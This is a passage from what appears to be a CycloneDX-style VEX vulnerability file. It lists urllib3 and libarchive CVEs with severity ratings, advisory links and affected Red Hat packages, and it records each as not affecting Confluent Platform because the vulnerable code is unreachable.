          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. Prior to 2.5.0, it is possible to disable redirects for all requests by instantiating a PoolManager and specifying retries in a way that disable redirects. By default, requests and botocore users are not affected. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable. This issue has been patched in version 2.5.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-50181"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-50181"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-pq67-6m6q-mj2v"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50181"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
        }
      ],
      "published": "2025-06-19T01:15:24+00:00",
      "updated": "2026-06-17T09:34:48+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-50182",
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. Starting in version 2.2.0 and prior to 2.5.0, urllib3 does not control redirects in browsers and Node.js. urllib3 supports being used in a Pyodide runtime utilizing the JavaScript Fetch API or falling back on XMLHttpRequest. This means Python libraries can be used to make HTTP requests from a browser or Node.js. Additionally, urllib3 provides a mechanism to control redirects, but the retries and redirect parameters are ignored with Pyodide; the runtime itself determines redirect behavior. This issue has been patched in version 2.5.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-50182"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-50182"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-48p4-8xcf-vxj5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50182"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-50182"
        }
      ],
      "published": "2025-06-19T02:15:17+00:00",
      "updated": "2026-06-17T09:34:48+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5915",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.6,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw can lead to a heap buffer over-read due to the size of a filter block potentially exceeding the Lempel-Ziv-Storer-Schieber (LZSS) window. This means the library may attempt to read beyond the allocated memory buffer, which can result in unpredictable program behavior, crashes (denial of service), or the disclosure of sensitive information from adjacent memory regions.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5915"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5915"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370865"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2599"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5915"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5915"
        }
      ],
      "published": "2025-06-09T20:15:26+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5916",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw involves an integer overflow that can be triggered when processing a Web Archive (WARC) file that claims to have more than INT64_MAX - 4 content bytes. An attacker could craft a malicious WARC archive to induce this overflow, potentially leading to unpredictable program behavior, memory corruption, or a denial-of-service condition within applications that process such archives using libarchive. This bug affects libarchive versions prior to 3.8.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5916"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5916"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370872"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2568"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2568/commits/bce70c4c26864df2a8d6953e7db6e4b156253508"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5916"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5916"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5917",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw involves an 'off-by-one' miscalculation when handling prefixes and suffixes for file names. This can lead to a 1-byte write overflow. While seemingly small, such an overflow can corrupt adjacent memory, leading to unpredictable program behavior, crashes, or in specific circumstances, could be leveraged as a building block for more sophisticated exploitation. This bug affects libarchive versions prior to 3.8.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5917"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5917"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370874"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2588"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5917"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5917"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5918",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
